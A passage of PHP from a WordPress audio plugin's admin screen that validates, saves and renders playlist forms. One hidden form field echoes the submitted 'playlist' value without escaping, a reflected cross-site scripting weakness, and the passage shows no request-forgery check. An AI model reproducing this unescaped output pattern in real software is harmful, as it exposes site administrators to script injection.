					$success_message = __('Playlist was successfully deleted.','uber-audio');
				}
				else{
					$error_message = __('A valid playlist was not specified.','uber-audio');
				}
				define('AP_ACTION', 'default');
				break;
			case 'process':

				//alias $_POST to make the name shorter
				$pd = &$_POST;
				//trim data
				foreach($pd as &$p){
					if(is_array($p)){

						//trim data
						foreach($p as &$t){
							$t['title'] = trim($t['title']);
							$t['url'] = trim($t['url']);
						}
						continue;
					}
					$p = trim($p);
				}

				//validation
				if(!isset($pd['title']) || mb_strlen($pd['title']) === 0){
					$errors['title'] = __('Please enter a name for this playlist','uber-audio');
					$no_errors = false;
				}

				$errors['tracks'] = array();
				//validate the tracks
				foreach($pd['tracks'] as $key => &$track){
					if(!isset($track['title']) || mb_strlen($track['title']) === 0){
						$errors['tracks'][$key]['title'] = __('Please enter a title for this track.','uber-audio');
						$no_errors = false;
					}

					if(!isset($track['url']) || mb_strlen($track['url']) === 0){
						$errors['tracks'][$key]['url'] = __('Please enter a URL to the audio file.','uber-audio');
						$no_errors = false;
					}

					if(!isset($errors['tracks'][$key]['url'])){

						//verify that the url entered returns a reponse code in the 200 range
						if(!UberAudio::isValidUrl($track['url'])){
							$errors['tracks'][$key]['url'] = __('Url is not valid','uber-audio');
							$no_errors = false;
						}
					}
				}

				if($no_errors){
					// save info
					if(array_key_exists('playlist', $_POST) && isset($playlists[$pd['playlist']])){
						$playlists[$pd['playlist']] = array(
							'title' => $pd['title'],
							'tracks' => $pd['tracks']
						);
					}
					else{
						$playlists[] = array(
							'title' => $pd['title'],
							'tracks' => $pd['tracks']
						);
					}
					$config['playlists'] = $playlists;
					update_option('uber_audio_config', $config);
					$success_message = 'Playlist was successfully ' . (array_key_exists('playlist', $_POST) && isset($playlists[$pd['playlist']]) ? 'updated' : 'added');
					unset($_POST);
					$playlist = array('tracks'=>array(''),'title'=>'');
					define('AP_ACTION', 'default');
				}
				else{
					$playlist = array(
						'title' => @$pd['title'],
						'tracks' => @$pd['tracks']
					);
					define('AP_ACTION', (array_key_exists('playlist', $_POST) && isset($playlists[$_POST['playlist']]) ? 'edit' : 'add'));
				}
				break;
			default:
				define('AP_ACTION', 'default');
		}
		if(AP_ACTION === 'default'){
			$playlist = array('tracks'=>array('','',''),'title'=>'');
		}
		?>
		<div id="uber-audio-logobar"><div id="uber-logo"></div></div>
		<div id="uber-audio-form-wrapper">
			<h2><span class="logo">&nbsp;</span>Uber Audio <?php _e('Options', 'uber-audio')?></h2>
			<?php
			if(!$no_errors){
				echo '<span class="error-message">' . __('There were one or more problems in your submission, please correct them and try again.','uber-audio') . '</span>';
			}
			if(isset($error_message)) echo '<span class="error-message">' . $error_message . '</span>';
			if(isset($success_message)) echo '<span class="success">' . $success_message . '</span>';

			if(!empty($playlists)) :
			?>
			<form action="<?php echo $page_url?>" method="post" id="ap_playlist-selection-form" accept-charset="utf-8">
				<div>
					<h3><?php _e('Edit an Existing Playlist', 'uber-audio')?></h3>
					<?php
					if(AP_ACTION === 'edit'):
					?>
					<a href="<?php echo $page_url . '&amp;action=add'?>" class="button" style="float: left;margin-bottom: 40px;"><?php _e('Add a Playlist', 'uber-audio')?></a>
					<?php
					endif;
					?>
					<div class="clear"></div>
					<div id="ua-playlist-wrap">
						<label for="f-playlists"><?php _e('edit a playlist', 'uber-audio')?>: </label>
						<select id="f-playlists" name="playlist" class="form-select">
							<option value="null"><?php _e('Select a Playlist', 'uber-audio')?></option>
							<?php
							foreach($playlists as $id => &$pl):
							?>
							<option value="<?php echo $id?>"><?php echo htmlentities($pl['title'], ENT_COMPAT, 'UTF-8')?></option>
							<?php
							endforeach;
							?>
						</select>
						<input type="submit" class="button" name="edit" value="<?php _e('Edit', 'uber-audio')?>"/>
						<input type="submit" class="button" name="delete" value="<?php _e('Delete', 'uber-audio')?>"/>
					</div>
				</div>
			</form>
			<?php endif; ?>
			<form action="<?php echo $page_url?>" method="post" id="ap_main-form" accept-charset="utf-8">
				<div>
					<?php
					if((AP_ACTION === 'add' || AP_ACTION === 'edit') && isset($_POST['playlist'])):
					?>
					<input type="hidden" name="playlist" value="<?php echo $_POST['playlist']?>"/>
					<?php
					endif;
					?>
					<input type="hidden" name="action" value="process" />
					<h3><?php echo (AP_ACTION !== 'edit' ? __('Add a Playlist', 'uber-audio') : sprintf(__('Edit Playlist "%s"', 'uber-audio'), htmlentities($playlist['title'], ENT_COMPAT, 'UTF-8'), 'uber-audio') )?></h3>
					<?php echo (isset($errors['title']) ? '<span class="error" style="margin: 0 0 0 111px">' . $errors['title'] . '</span>' : '')?>
					<div id="ua-track-title-wrap">
						<div class="track-number"><?php _e('playlist title', 'uber-audio')?>: </div>
						<input type="text" name="title" title="<?php _e('Give your playlist a title', 'uber-audio')?>" class="hint-text" id="f-title" value="<?php echo htmlentities(@$playlist['title'], ENT_COMPAT, 'UTF-8')?>"/>
					</div>
					<?php
					if(!isset($config['mp3_warning'])):
					?>
					<div id="mp3-warning"><?php _e('Please note that only MP3 audio files are fully-supported cross-browser.', 'uber-audio')?> <a href="#"><?php _e('Dismiss', 'uber-audio')?></a></div>
					<?php
					endif;
					?>
					<ul id="uber_audio-playlist">
						<?php

						foreach($playlist['tracks'] as $key => &$track):
						?>
						<li class="track">
							<div class="track-number"><?php echo __('Track', 'uber_audio') . ($key+1)?>:</div>
							<div class="info">
								<div class="track-url">
									<a href="#" class="action_upload" ><?php _e('Upload', 'uber-audio')?></a>
									<div class="container">
										<?php echo (isset($errors['tracks'][$key]['url']) ? '<span class="error">' . $errors['tracks'][$key]['url'] . '</span>' : '')?>
										<input type="text" title="http://" class="hint-text" name="tracks[<?php echo $key?>][url]" id="f-url-<?php echo $key?>" value="<?php echo htmlentities(@$track['url'], ENT_COMPAT, 'UTF-8')?>"/>
									</div>
								</div>
								<div class="track-title">
								<?php echo (isset($errors['tracks'][$key]['title']) ? '<span class="error">' . $errors['tracks'][$key]['title'] . '</span>' : '')?>
									<input type="text" title="<?php _e('Track Title', 'uber-audio')?>" class="hint-text" name="tracks[<?php echo $key?>][title]" id="f-title-<?php echo $key?>" value="<?php echo htmlentities(@$track['title'], ENT_COMPAT, 'UTF-8')?>"/>
								</div>
							</div>
							<div class="actions">
								<a href="#" class="action_add" title="<?php _e('Add a Track', 'uber-audio')?>"><?php _e('Add Track', 'uber-audio')?></a>
								<a href="#" class="action_delete" title="<?php _e('Delete Track', 'uber-audio')?>"><?php _e('Delete Track', 'uber-audio')?></a>
							</div>
						</li>
						<?php
						endforeach;
						?>
					</ul>
					<div class="clear"></div>
					<div style="margin-left: 12px;">
						<input id="ua_action_submit-playlist" type="submit" class="button-primary action_submit-playlist" value="<?php _e('Submit', 'uber-audio')?>"/>
					</div>
					<br />
				</div>

			</form>
		</div>
		<?php
	}
}
